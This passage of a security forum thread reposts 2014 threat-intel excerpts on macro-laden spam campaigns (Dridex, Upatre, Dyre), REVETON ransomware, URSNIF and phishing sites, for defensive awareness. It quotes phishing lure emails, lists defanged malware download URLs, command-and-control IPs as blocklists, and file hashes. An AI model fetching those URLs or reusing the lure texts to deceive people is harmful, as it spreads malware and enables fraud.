This is downloaded and saved to %TEMP%\LNKCLHSARFL.exe. This binary only has a detection rate of 3/56** at VirusTotal. The Malwr report shows that it POSTs data to 203.172.141.250 (Ministry of Education, Thailand), which has been commonly used in this sort of attack (I strongly recommend that you -block- this IP). It also drops a DLL which is probably Dridex, which has a detection rate of only 1/55***."
* https://www.virustotal.com/en/file/939fb5c4bdfa7a7a5ede2813ec3b4a8ceb17a0247b27f13e9cea590cc6e1bb87/analysis/1418293134/
** https://www.virustotal.com/en/file/9fae183a06c6980b8f6662156612e395e70cf75aa1c266037fcbbd283e9923ad/analysis/1418293637/
*** https://www.virustotal.com/en/file/a35597d4ae580653b5c26f0e739215e63ab39e74a76903357ed1616d096e1962/analysis/1418294506/
- http://myonlinesecurity.co.uk/uk-fuels-e-bill-word-doc-malware/
11 December 2014 : 35056_49_2014.doc (89kb) Current Virus total detections: 0/56*
35056_49_2014.doc (69kb) Current Virus total detections: 0/56**
* https://www.virustotal.com/en/file/939fb5c4bdfa7a7a5ede2813ec3b4a8ceb17a0247b27f13e9cea590cc6e1bb87/analysis/1418285959/
** https://www.virustotal.com/en/file/1e367459dd260c055f3b51cf22d7d8125cfc14b3d3178d6b3cf60850091f4dc7/analysis/1418285875/
___
Fake 'RBS Important Docs' SPAM – doc malware
- http://myonlinesecurity.co.uk/rbs-important-docs-word-doc-malware/
11 Dec 2014 - "'RBS Important Docs' pretending to come from Lenore Hinkle <Lenore@ rbs .co .uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review attached documents regarding your account.
Tel: 01322 182123
Fax: 01322 011929
email: Lenore@ rbs .co.uk
This information is classified as Confidential unless otherwise stated.
11 December 2014: RBS_Account_Documents.doc (1mb) Current Virus total detections: 1/56*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e1552f04ca253e3910d0b3fa0e96bca3ce43561c2cb53162bad1436b4d5f0de5/analysis/1418306209/
___
REVETON Ransomware spreads ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/reveton-ransomware-spreads-with-old-tactics-new-infection-method/
Dec 11, 2014 - "... Over the past few months spanning October up to the last weeks of November, we observed a noticeable increase in REVETON malware variants, in particular, TROJ_REVETON.SM4 and TROJ_REVETON.SM6... Below is the warning message along with a MoneyPak form to transfer the payment of $300 USD. The message also warns users that they have only 48 hours to pay the fine.
Fake warning messages from Homeland Security and the ICE Cyber Crime Center:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/homeland_ice.png
... the healthcare industry seems to be the most affected industry by this malware and mostly centered in the United States, followed by Australia. Below is a ranking of most affected countries by this new wave of REVETON malware spanning October to November 2014.
Data for TROJ_REVETON.SM4 and TROJ_REVETON.SM6 for October – November 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/reveton-new-infect2.jpg
... It might be jarring for users to suddenly receive a message supposedly sent by law enforcement agencies. However, they need to keep in mind that this is just a tactic intended to “scare” users into paying the fee. Users might also be tempted to pay the ransom to get their computers up and running once again. Unfortunately, there is no guarantee that paying the ransom will result in having the computer screen unlocked. Paying the ransom will only guarantee more money going into the pockets of cybercrooks... Some ransomware variants arrive as attachments of spammed messages. As such, users should be wary of opening emails and attachments, especially those that come from unverified sources. If the email appears to come from a legitimate source (read: banks and other institutions), users should verify the email with the bank. If from a personal contact, -confirm- if they sent the message. Do not rely solely on trust by virtue of relationship, as friends or family members may be victims of spammers as well."
___
Phish: CloudFlare SSL certificate abused
- https://blog.malwarebytes.org/fraud-scam/2014/12/free-ssl-certificate-from-cloudflare-abused-in-phishing-scam/
Dec 11, 2014 - "... received a phishing email pretending to come from LogMeIn, the popular remote administration tool. It uses a classic scare tactic “We were unable to charge your credit card for the due amount.( Merchant message – Insufficient funds )” to trick the user into opening up a
-fake- invoice:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/unphish.png
... What struck our interest here was the fact that this link was https based. It was indeed a secure connection... with a valid certificate:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/certificatechain.png
On September 29, CloudFlare, a CDN and DNS provider amongst other things, announced Universal SSL, a feature available to all its paid and free customers. It is not the first time cyber-criminals are abusing CloudFlare, and this case is not entirely surprising. By giving a false sense of security (the HTTPS padlock), users are more inclined to follow through and download the malicious file.
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/properties.png
... CloudFlare is issuing a warning that the URL is a ‘Suspected phishing site':
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/warning.png
In some regard SSL certifications may become like digitally signed files, where while they do add a level of trust one should still exercise caution and not blindly assume everything is fine. It might be difficult to keep up with each and every new site that wants to abuse the system (cat-and-mouse game)... We can certainly expect cyber criminals to start using SSL more and more given that it is freely available and not extremely difficult to put in place. Another standard known as Extended Validation Certificate SSL (EV SSL) requires additional validation than plain SSL, but again, this does not make things simple for the end user. If regular SSL is deemed weak, then we have a bit of a problem... We have reported this URL to CloudFlare and hope they can revoke the SSL certificate and shutdown the site."
:fear: :mad:
AplusWebMaster
2014-12-12, 19:32
FYI...
Info-Stealing file infector hits US, UK
- http://blog.trendmicro.com/trendlabs-security-intelligence/info-stealing-file-infector-hits-us-uk/
Dec 11, 2014 5:15 pm (UTC-7) - "... there has been a spike in infections related to the malware URSNIF. The URSNIF family is known to steal information such as passwords. Spyware are always considered high risk, but these URSNIF variants can cause damage beyond info-stealing. These URSNIF variants are file-infectors — which is the cause of the noted spike... the countries most affected by the spike are the United States and the United Kingdom. These two countries comprise nearly 75% of all the infections related to these URSNIF variants. Canada and Turkey are the next countries most affected by malware.
Countries affected by URSNIF spike, based on data gathered for December 2014 so far:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/URSNIF-spike.jpg
Additional feedback shows that education, financial, and manufacturing were among the industries affected by this spike... It infects all .PDF, .EXE, and .MSI files found in all removable drives and network drives. URSNIF packs the found files and embeds them to its resource section. When these infected files were executed, it will drop the original file in %User Temp% (~{random}.tmp.pdf, ~{random}.tmp.exe) and then execute it to trick user that the opened file is still fine... After deleting the original .PDF file, it will create an .EXE file using the file name of the original .PDF file. As for .MSI and .EXE files, it will insert its code to the current executable. It will only infect .EXE files with “setup” on its filename.
Difference between an infected (top) and clean (bottom) .PDF file. The infected file is 3.18 MB while the clean file is 2.89 MB:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/URSNIF-spike3.png
For MSI files, it will execute the original file first before executing the malware code. For .PDF and .EXE files, it will produce a dropper-like Trojan, which will drop and execute the original file and the main file infector... The malware family URSNIF is more known as spyware. Variants can monitor network traffic by hooking network APIs related to top browsers such as Internet Explorer, Google Chrome, and Mozilla Firefox. It is also known for gathering information. However, the fact that a family known for spyware now includes file infectors shows that cybercriminals are not above tweaking established malware to expand its routines... A different file infector type (e.g., appending) requires a different detection for security solutions; not all solutions may have this detection. Another notable feature for this particular malware is that it starts its infection routine 30 minutes after its execution... variants often arrive via spammed messages and Trojan dropper/downloader malware. Users need a comprehensive security solution that goes beyond detecting and blocking malware. Features like email reputation services which can detect and block spam and other email-related threats can greatly boost a computer’s security... infected .PDF and .EXE files as PE_URSNIF.A2. Infected .MSI files are detected as PE_URSNIF.A1.
Hash of the related file:
dd7d3b9ea965af9be6995e823ed863be5f3660e5
44B7A1555D6EF109555CCE88F2A954CAFE56B0B4
EFC5C6DCDFC189742A08B25D8842074C16D44951
FD3EB9A01B209572F903981675F9CF9402181CA1 "
___
Fake 'Order' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/wavecablecom-order-r58551-spam.html
12 Dec 2014 - "This -fake- invoice comes with a malicious attachment.
From: kaybd2@ wavecable .com
Date: 12 December 2014 at 17:17
Subject: Order - R58551
Thanks for placing order with us today! Your order is now on process.
Outright Purchase: 6949 US Dollars
Please click the word file provided below to see more details about your order.
BILLING DETAILS
Order Number: ZJW139855932
Purchase Date: 13.07 11.12.2014
Customer Email: info@ [redacted]
Attached is a malicious Word document INVOICE_7794.DOC which has a detection rate of 4/56* on VirusTotal... macro downloads an executable from:
http ://www.2fs. com .au/tmp/rkn.exe
That has a VirusTotal detection rate of 5/55**... A malicious DLL is dropped onto the system with a VirusTotal detection rate of 2/56***. The only detections are generic, but similar dropped DLLs have been the Dridex banking trojan.
Recommended blocklist:
209.208.62.36
5.187.1.78
46.250.6.1
5.135.28.106
66.213.111.72
95.211.188.129 "
* https://www.virustotal.com/en/file/902aa90dd61f1a89a547726ff06555285463c826d1af673ebdcc148c2200b229/analysis/1418406000/
** https://www.virustotal.com/en/file/90fca160a837f62fdcff2fc3d0a849498a3485c39c7c42a12dc959f5e5db0e56/analysis/1418406121/
*** https://www.virustotal.com/en/file/b13eb856439baf196084f6fc47825d9c677199f71724f351cdd193e30e2618c4/analysis/1418408045/
___
Spammers Accelerate Dyre Distribution
- http://www.threattracksecurity.com/it-blog/dyre-spam/
Dec 12, 2014 - "... Over the last few weeks, the cybercriminals behind Dyre have continued to refine their delivery tactics, and the Trojan is now capable of helping to spread itself and other malware. Our researchers have observed that systems infected with Dyre are not only at risk of the malware stealing log-in credentials, but it may also receive commands to download and install additional spammers – including the Cutwail/Pushdo botnet – to more broadly propagate Dyre. Pushdo is responsible for a large portion of Upatre spam, and the botnet is actively distributing Dyre and other malware, including the data-encrypting ransomware CryptoWall... The bad guys are pulling out all the stops when it comes to distributing their malicious spam. Everything from fraudulent PayPal security alerts to a Top Gun-inspired tale about a Norwegian fighter pilot crossing paths with a Russian MiG to a fake survey purporting to ask recipients their opinions on the controversial events in Ferguson, Missouri, have all been employed to trick recipients into clicking links and opening infected attachments. We recently observed Dyre downloading three spammers. The first, is Pushdo, which runs its own spammer modules. The second and third are a standalone spammers, one of which hijacks the victim’s Microsoft Outlook application to send personal emails with attachments harboring Upatre. The third spammer (see images and email text below from a small sampling) is generating a separate campaign and is increasing in frequency over the last several weeks. All this signals that Dyre is poised to become a more pervasive threat and increasingly active in malicious spam campaigns.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/12/CNN-Norwegian-Russian-MiG-Spam.png
(Multiple other SPAM samples shown at the threattracksecurity URL at the top of this post.)
...Ensure your antivirus and endpoint security is up-to-date, and deploy a robust email security solution to protect your organization from malicious spam. IT admins should continue to educate their users about email-borne threats and stress that despite them being at work, they shouldn’t click links and open attachments without regard for security... Consumers should -always- be cautious about what they click, and if there is any doubt about a warning, special offer or request for private information, contact the bank, retailer or service provider directly by -phone- to confirm."
___
Wire transfer spam spreads Upatre
- http://blogs.technet.com/b/mmpc/archive/2014/12/11/wire-transfer-spam-spreads-upatre.aspx
11 Dec 2014 - "... currently monitoring a spam email campaign that is using a wire transfer claim to spread Trojan:Win32/Upatre. It is important to note that customers running up-to-date Microsoft security software are protected from this threat..."
:fear::fear: :mad:
AplusWebMaster
2014-12-15, 17:17
FYI...
Fake 'Payment Advice' SPAM - malicious doc attached
- http://blog.dynamoo.com/2014/12/malware-spam-ifs-applications.html
15 Dec 2014 - "This -fake- payment advice spam is not from Vitacress but is a -forgery- with a malicious Word document attached.
From: IFS Applications [Do_Not_Reply@ vitacress .co.uk]
Date: 15 December 2014 at 07:49
Subject: DOC-file for report is ready
The DOC-file for report Payment Advice is ready and is attached in this mail.
Attached is a file Payment Advice_593016.doc which is actually one of two different documents with zero detections at VirusTotal [1] [2] and contain one of two malicious macros... that download a malware binary from one of the following locations:
http ://gv-roth .de/js/bin.exe
http ://notaxcig .com/js/bin.exe
This file is saved as %TEMP%\DYIATHUQLCW.exe and is currently has a VirusTotal detection rate of just 1/52*. The ThreatExpert report and Malwr report shows attempted connections to the following IPs which have been used in many recent attacks and should be -blocked- if you can:
203.172.141.250 (Ministry of Education, Thailand)
74.208.11.204 (1&1, US)
The malware almost definitely drops the Dridex trojan onto the target system, but I have not been able to get a sample of this yet."
1] https://www.virustotal.com/en/file/d61aa6195a2da022d16af3694050b51e29bc7ef7a6f3ad735c3a20f81891b601/analysis/1418633977/
2] https://www.virustotal.com/en/file/b988ba06d6898fda8b4513be69fd7a2a4f6fe2354ce8e89bfc0db1a25c5b34fe/analysis/1418633990/
* https://www.virustotal.com/en/file/5379e5176d554ab5d66cabfec28b107c104aa3d4e200dcd44baf898771f61d97/analysis/1418634587/
>> http://myonlinesecurity.co.uk/ifs-applications-doc-file-report-ready-word-doc-malware/
15 Dec 2014
1] https://www.virustotal.com/en/file/b988ba06d6898fda8b4513be69fd7a2a4f6fe2354ce8e89bfc0db1a25c5b34fe/analysis/1418628093/
2] https://www.virustotal.com/en/file/d61aa6195a2da022d16af3694050b51e29bc7ef7a6f3ad735c3a20f81891b601/analysis/1418628835/
- http://blog.mxlab.eu/2014/12/15/email-doc-file-for-report-is-ready-contains-malicious-word-macro-file-that-downloads-trojan/
Dec 15, 2014
> https://www.virustotal.com/en/file/5379e5176d554ab5d66cabfec28b107c104aa3d4e200dcd44baf898771f61d97/analysis/
... Behavioural information
TCP connections
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___
GoDaddy 'Account Notice' - Phish ...
- http://www.hoax-slayer.com/godaddy-account-error-phishing-scam.shtml
Dec 15, 2014 - "Email purporting to be from web hosting company GoDaddy claims that your account may pose a potential performance risk to the server because it contains 'too many directories'... The email is -not- from GoDaddy. It is a phishing scam designed to steal your GoDaddy login details. A link in the message takes you to a -fake- Go Daddy login page...
Example:
Subject: Account Notice : Error # 7962
Dear Valued GoDaddy Customer: Brett Christensen
Your account contains more than 3331 directories and may pose a potential performance risk to the server.
Please reduce the number of directories for your account to prevent possible account deactivation.
In order to prevent your account from being locked out we recommend that you create special TMP directory.
Or use the link below :
[Link Removed]
Sincerely,
GoDaddy Customer Support...
... criminals responsible for this phishing attack can use the stolen login details to hijack the victims' GoDaddy account. Once they have gained access to the account, the criminals can take control of the victim's website and email addresses and use them to perpetrate, spam, scam, and malware attacks. Always login to your online accounts by entering the web address into your browser's address bar rather than by clicking-a-link in an email."
:fear: :mad:
AplusWebMaster
2014-12-16, 17:09
FYI...
Fake 'eFax Drive' SPAM - malicious ZIP
- http://blog.mxlab.eu/2014/12/16/url-in-fake-email-from-efax-drive-youve-received-a-new-fax-leads-to-malicious-zip-archive/
Dec 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “You’ve received a new fax”. This email is sent from the -spoofed- address and has the following body:
New fax at SCAN9106970 from EPSON by https ://******* .com
Scan date: Tue, 16 Dec 2014 13:17:59 +0000
Number of pages: 2
Resolution: 400×400 DPI
You can secure download your fax message at:
hxxp: //nm2b .org/bhnjhkkgvq/ufqielyyva.html
(eFax Drive is a file hosting service operated by J2, Inc.)
The downloaded file document7241_pdf.zip contains the 33 kB large file document7241_pdf.scr. The trojan is known as Packed.Win32.Katusha.1!O or Malware.QVM20.Gen. At the time of writing, 2 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/d8b1d64ae49b437df163061af11c8f0f0e5dad338c37cfedd4e6f30e37f6499c/analysis/
nm2b .org: 173.254.28.126: https://www.virustotal.com/en/ip-address/173.254.28.126/information/
___
Fake 'Bank account frozen' SPAM - doc malware
- http://myonlinesecurity.co.uk/bank-account-frozen-notice-note-attention-fake-word-doc-malware/
16 Dec 2014 - "'Bank account frozen notice, note, attention. Attention #CITI-44175PI-77527' with a cab attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is an automatically generated email. Please do not reply as the email address is not monitored for received mail.
Notification Number: 8489465
Mandate Number: 6782144
Date: December 16, 2014. 01:13pm
In an effort to protect your Banking account, we have frozen your account until such time that it can be safely restored by you. Please view attached file “CITI-44175PI-77527.cab” for details.
Yours truly,
Kathy Schuler ...
16 December 2014: CITI-44175PI-77527.cab : Extracts to: CITI-44175PI-77527.scr
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word.doc file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0699621c07f92b81d0b7eef250ae15830c10034b8f1b04a07e0fb43cbcfea54/analysis/1418745402/
___
Wells Fargo Secure Meessage Spam
http://threattrack.tumblr.com/post/105365947973/wells-fargo-secure-meessage-spam
Dec 16, 2014 - "Subjects Seen:
You have a new Secure Message
Typical e-mail details:
You have received a secure message
Read your secure message by download document-75039.pdf. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
In order to view the secure message please download it using our Cloud Hosting:
nexpider .com/sawdnilhvi/ckyilmmoca.html
Malicious URLs:
nexpider .com/sawdnilhvi/ckyilmmoca.html
Malicious File Name and MD5:
document82714.scr (98FE8CAD93B6FCDE63421676534BCC57)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8dec4c587c25e211bdabdb5bb92d35e4/tumblr_inline_ngostrpvc41r6pupn.png
Tagged: Upatre, Wells Fargo
____
Trawling for Phish
- https://blog.malwarebytes.org/online-security/2014/12/trawling-for-phish/
Dec 16, 2014 - "... avoid on your travels, whether you’re sent a link to them directly or see the URLs linked in an email. First up, a page located at:
secure-dropboxfile (dot)hotvideostube(dot)net/secure-files-dropbox/document/
It claims to offer a shared Dropbox document in return for entering your email credentials. It follows the well-worn pattern of offering multiple login options for different types of email account, including Gmail, AOL, Windows Live, Yahoo and “other”:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn1.jpg
The website itself has a poor reputation on Web of Trust, has been listed as being compromised on defacement archives and was also hosting a banking phish not so long ago. Should visitors attempt to login, it sends them to a shared Google Document (no Dropbox files on offer here) which is actually a “public prayer request” spreadsheet belonging to a Church:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn3.jpg
The next page is Google Drive themed and located at:
yellowpagesexpress (dot)com/cgi-bin/Secure Management/index(dot)php
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn2.jpg
As before, it asks the visitor to login with the widest possible range of common email accounts available, before sending those who enter their details to an entirely unrelated Saatchi Art investment webpage. Readers should always be cautious around pages claiming to offer up files in return for email logins – it’s one of the most common tactics for harvesting password credentials."
:fear: :mad:
AplusWebMaster
2014-12-17, 14:31
FYI...
Fake 'PL REMITTANCE' malware SPAM
- http://blog.dynamoo.com/2014/12/pl-remittance-details-ref844127rh.html
17 Dec 2014 - "This -fake- remittance advice comes with a malicious Excel attachment.
From: Briana
Date: 17 December 2014 at 08:42
Subject: PL REMITTANCE DETAILS ref844127RH
The attached remittance details the payment of £664.89 made on 16-DEC-2014 by BACSE.
This email was generated using PL Payment Remittance of Integra Finance System.
Can you please check that your supplier details are correct, if any changes are required please email back to this email address quoting your remittance reference.
The reference in the subject and the name of the Excel attachment differ from email to email, but are always consistent in the same message. There are two poorly detected malicious Excel files that I have seen [1] [2] containing two slightly different macros.. which then reach out to the following download locations:
http ://23.226.229.112:8080/stat/lldv.php
http ://38.96.175.139:8080/stat/lldv.php
The file from these locations is downloaded as test.exe and is then saved to %TEMP%\VMHKWKMKEUQ.exe. This has a VirusTotal detection rate of 1/55*. The ThreatTrack report shows it POSTing to the following IP:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
This IP has been used in several recent attacks and I strongly recommend blocking it. The Malwr report also shows it dropping a malicious DLL identified as Dridex. The ThreatExpert report gives some different IPs being contacted:
80.237.255.196 (Denes Balazs / HostEurope, Germany)
85.25.20.107 (PlusServer, Germany)
The Ukrainian IP is definitely malicious, but if you wanted to establish maximum protection then I would recommend the following blocklist:
194.146.136.1
80.237.255.196
85.25.20.107
23.226.229.112
38.96.175.139 "
1] https://www.virustotal.com/en/file/3f6d780eee13390c19d15d309a85f512091bc469350023b075a7b5b88ceddc4d/analysis/1418810946/
2] https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/1418810941/
* https://www.virustotal.com/en/file/a1699fdddc2ffcfdc55b71861b7851719cb277a655053403b1a6fec0c895a264/analysis/1418810686/
> http://blog.mxlab.eu/2014/12/17/new-fake-email-pl-remittance-details-ref1790232eg-with-malcious-xls-in-the-wild/
Dec 17, 2014
Screenshot of the XLS: http://img.blog.mxlab.eu/2014/20141205_remittance_01.gif
- https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/
> http://myonlinesecurity.co.uk/integra-finance-system-pl-remittance-details-ref6029413oh-excel-xls-malware/
17 Dec 2014
- https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/1418816542/
> https://www.virustotal.com/en/file/3f6d780eee13390c19d15d309a85f512091bc469350023b075a7b5b88ceddc4d/analysis/1418817871/
___
Fake 'Blocked ACH Transfer' SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/12/blocked-ach-transfer-spam-has-malicious.html
17 DEC 2014 - "Another spam run pushing a malicious Word attachment..
Date: 17 December 2014 at 07:27
Subject: Blocked ACH Transfer
The ACH transaction (ID: 618003565), recently sent from your online banking account, was rejected by the Electronic Payments Association.
Canceled transaction
ACH file Case ID 623742
Total Amount 2644.93 USD
Sender e-mail info@mobilegazette.com
Reason for rejection See attached word file
Please see the document provided below to have more details about this issue...
Screenshot: https://2.bp.blogspot.com/-HHVnC18smUE/VJGXBjF2VVI/AAAAAAAAF-o/yzQZ2etQFYk/s1600/ach.png
Attached is a file ACH transaction 3360.doc which isn't actually a Word 97-2003 document at all, but a malicious Word 2007 document that would normally have a .DOCX extension (which is basically a ZIP file). The current VirusTotal detection rate of this is just 1/55*. Inside this is a malicious macro... which downloads a file from:
http ://www.lynxtech .com.hk/images/tn.exe
This has a VirusTotal detection rate of just 1/54**. The Malwr report shows it POSTING to 5.187.1.78 (Fornex Hosting, Germany) and also a query to 209.208.62.36 (Atlantic.net, US). Presumably this then drops additional components onto the infected system, although I do not know what they are.
Recommended blocklist:
5.187.1.78
209.208.62.36 "
* https://www.virustotal.com/en/file/61b8edb31972b04fd2652278cca4431f498ed7930833848233da057ebf842660/analysis/1418826644/
** https://www.virustotal.com/en/file/1269bc3080617da54bdf74b04073c273109545643159883147f141742eb9fc75/analysis/1418826840/
___
Exploit Kits in 2014
- http://blog.trendmicro.com/trendlabs-security-intelligence/whats-new-in-exploit-kits-in-2014/
Dec 17, 2014 - "... Exploits targeting Internet Explorer, Silverlight, and Adobe Flash vulnerabilities were frequently used by exploit kits in the past year. The four vulnerabilities below were some of the most frequently targeted by exploit kits:
CVE-2013-0074 (Silverlight)
CVE-2014-0515 (Adobe Flash)
CVE-2014-0569 (Adobe Flash)
CVE-2014-2551 (Internet Explorer)
The most notable change in this list is the relative absence of Java vulnerabilities. Exploit kits have been removing Java because of the increasing use of click-to-play for Java applets, rendering Java a far less attractive target for exploits. The tables below shows which exploits are in use by exploit kits:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/exploit-kit-usage.png
Plugin Detection: Almost all exploit kits run some sort of software that detect the browser platform a would-be victim is running in order to determine which exploit to send to the user.
The code necessary to do this varies from one exploit kit to another, and is actually fairly complex due to the number of permutations of browsers and plugins that are possible.
Two exploit kits – Nuclear and FlashPack – use a legitimate JavaScript library, PluginDetect. This minimizes the work the creators of the exploit kit need to do, as well as providing a complete set of features. However, this also means that this library has known characteristics: this makes it more visible to security vendors looking for sites used by exploit kits. By contrast, most exploit kits write their own library to perform this task. This makes detection harder, but it also reduces the capabilities of the libraries. Many of these libraries, for example, will only function under Internet Explorer. The Magnitude exploit kit uses a third method – server-side code – too. The following table summarizes which libraries are used.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/exploit-kit-detect-b.png
Antivirus Detection: A new feature that has been added to exploit kits is the ability to detect installed security software. If certain specific security products are installed, the exploit kit will stop itself from running. Both antivirus products and virtual machine software can be targeted in this manner. This behavior is possible due to a vulnerability in Internet Explorer (CVE-2013-7331). This vulnerability allows an attacker to check for the presence of files and folders on an affected system. It was first reported to Microsoft in February 2014, but was only patched in September of the same year as part of MS14-052. The following table summarizes the products that each exploit kit detects:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/exploit-kit-software.png
Obfuscation Techniques: Exploit kits regularly use various techniques to obfuscate their activity, but some exploit kits have added new techniques. In both of these cases, the attackers are using legitimate tools to obfuscate their files. The Angler exploit kit now uses the Pack200 format to help avoid detection. Pack200 is a compactive archive format that was developed by Sun (Java’s original developers) to compress .JAR files significantly. Tools to uncompress these files are provided as part of the Java development kit, but many security products don’t support these formats (so they are unable to scan the said malicious file)...
Summary: Exploit kit developers have not been idle in the year since the collapse of the Blackhole exploit kit. They have made various improvements that help improve the capabilities of these tools. The defenses against these tools on the part of users remains the same. We highly recommend that users implement all updates to their software as is practical, since many of the vulnerabilities targeted by attackers have long been fixed by software vendors."
___
Dyre Banking Trojan - Secureworks
- http://www.secureworks.com/cyber-threat-intelligence/threats/dyre-banking-trojan/
Dec 17 2014
:mad: :fear::fear:
AplusWebMaster
2014-12-18, 14:57
FYI...
More than 100,000 'WordPress sites infected with Malware'
- https://www.sans.org/newsletters/newsbites/xvi/99#301
Dec 15, 2014 - "More than 100,000 websites running on WordPress content management system have been found to be infected with malware that attacks the devices of site visitors. Google has blacklisted more than 11,000 domains. Reports suggest that the attackers exploited a vulnerability in the Slider Revolution Premium plug-in*, which the company has known about since September 2014..."
> http://arstechnica.com/security/2014/12/some-100000-or-more-wordpress-sites-infected-by-mysterious-malware/
Dec 15, 2014
(More links at the sans URL above.)
* http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html
Dec 14, 2014
___
Fake 'AquAid Card' SPAM – doc malware
- http://myonlinesecurity.co.uk/tracey-smith-aquaid-card-receipt-word-doc-malware/
18 Dec 2014 - "'AquAid Card Receipt' pretending to come from Tracey Smith <tracey.smith@aquaid.co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... This email has what appears to be a genuine word doc attached which is malformed and contains a macro script virus. Modern versions of Microsoft office, that is Office 2010 and 2013 and Office 365 have Macros disabled by default, UNLESS you or your company have enabled them. If protected view mode is turned off and macros are enabled then opening this malicious word document will infect you, and simply previewing it in windows explorer or your email client might well be enough to infect you. Definitely DO -NOT- follow the advice they give to enable macros to see the content... The email looks like:
Hi
Please find attached receipt of payment made to us today
Tracey
Tracey Smith| Branch Administrator
AquAid | Birmingham & Midlands Central
Unit 35 Kelvin Way Trading Estate | West Bromwich | B70 7TP ...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Card-Receipt-Aquaid-malicious-email.jpg
The macros in this malicious word doc try to connect to http ://sardiniarealestate .info/js/bin.exe ..which is saved as %TEMP%\YEWZMJFAHIB.exe – this has a marginally better detection rate of 3/53*. As we have seen in so many recent attacks like this one, there are 2 versions of the malware:
18 December 2014 : CAR014 151239.doc ( 124kb) | Current Virus total detections: 2/56**
CAR014 151239.doc (130 kb) | Current Virus total detections: 2/55***
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it. Now that is very easy to say but quite hard to put into practice, because we all get emails with files attached to them..."
* https://www.virustotal.com/en/file/b73b4a11f725137a4e1aa19236a5b61671d0880edc8ba1c4d7dd22031e55a922/analysis/1418893740/
** https://www.virustotal.com/en/file/c3b99aa07e32acf3411a46dc484fbb6f9327398e207fbd1595a964084bb8a375/analysis/1418891360/
*** https://www.virustotal.com/en/file/048714ed23c86a32f085cc0a4759875219bdcb0eb61dabb2ba03de09311a1827/analysis/1418891888/
> http://blog.dynamoo.com/2014/12/malware-spam-aquaidcouk-card-receipt.html
18 Dec 2014
- https://www.virustotal.com/en/file/c3b99aa07e32acf3411a46dc484fbb6f9327398e207fbd1595a964084bb8a375/analysis/1418893415/
... Recommended blocklist:
74.208.11.204
81.169.156.5 "
___
Fake 'Internet Fax' SPAM - trojan Upatre.FH
- http://blog.mxlab.eu/2014/12/18/email-internet-fax-job-contains-url-that-downloads-trojan-upatre-fh/
Dec 18, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Internet Fax Job”, the email is sent from the spoofed address “MyFax <no-replay@ my-fax.com>” and has the following body:
Fax image data
hxxp ://bursalianneler .com/documents/fax.html
The downloaded file fax8642174_pdf contains the 21 kB large file fax8642174_pdf.exe. The trojan is known as Upatre.FH. The trojan will installs itself by creating the service ioiju.exe and makes sure that it boots when Windows starts, modifies several Windows registries... At the time of writing, 1 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/745a25bcff06daf957730207c8b34704288fc5232fac81a228a5f2b4f577f048/analysis/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
192.185.52.226: https://www.virustotal.com/en/ip-address/192.185.52.226/information/
78.46.73.197: https://www.virustotal.com/en/ip-address/78.46.73.197/information/
UDP communications
203.183.172.196: https://www.virustotal.com/en/ip-address/203.183.172.196/information/
203.183.172.212: https://www.virustotal.com/en/ip-address/203.183.172.212/information/
___
Fake 'JPMorgan Chase' SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/jpmorgan-chase-co-received-new-secure-message-fake-pdf-malware/
